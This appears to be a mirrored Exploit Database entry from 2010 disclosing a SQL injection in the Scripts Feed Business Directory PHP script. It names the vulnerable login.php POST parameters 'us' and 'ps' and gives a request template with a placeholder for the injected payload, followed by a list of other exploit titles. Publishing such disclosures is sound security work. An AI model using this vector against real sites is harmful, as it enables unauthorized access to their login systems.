Scripts Feed Business Directory – SQL Injection

Exploit Database
76 阅读

作者： Crux

日期： 2010-02-27
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11592/

==============================================================================
[~] Scripts Feed Business Directory SQL Injection Vulnerability
==============================================================================
[+] My home[ http://hack-tech.com ]
[+] Date Submitted:[ February 27 2010 ]
[+] Founder: [ Crux ]
[+] Vendor:[ Scriptsfeed ]
[+] Version: [ ALL ]
[+] Download:[ http://www.scriptsfeed.com/business-directory.html ]


[ EXPLOIT ]
- This vulnerability affects login.php
-The POST variables 'us' and 'ps' are vulnerable.

[ ATTACK DETAILS ]
us=user&ps=${SQLINJECTIONHERE}&s1=LOGIN

==============================================================================

last Exploits
Scripts Feed Business Directory – SQL Injection的更多信息

PerfexCRM 1.9.7 – Arbitrary File Upload：
Zikula Application Framework 1.2.2 – ‘index.php?func’ Cross-Site Scripting：
FineCMS 1.0 – Multiple Vulnerabilities：
spidaNews 1.0 – ‘news.php?id’ SQL Injection：
Webiz – SQL Injection：
Traidnt Up 3.0 – SQL Injection：
FlexNet Publisher 11.12.1 – Cross-Site Request Forgery (Add Local Admin)：
RATES SYSTEM 1.0 – ‘Multiple’ SQL Injections：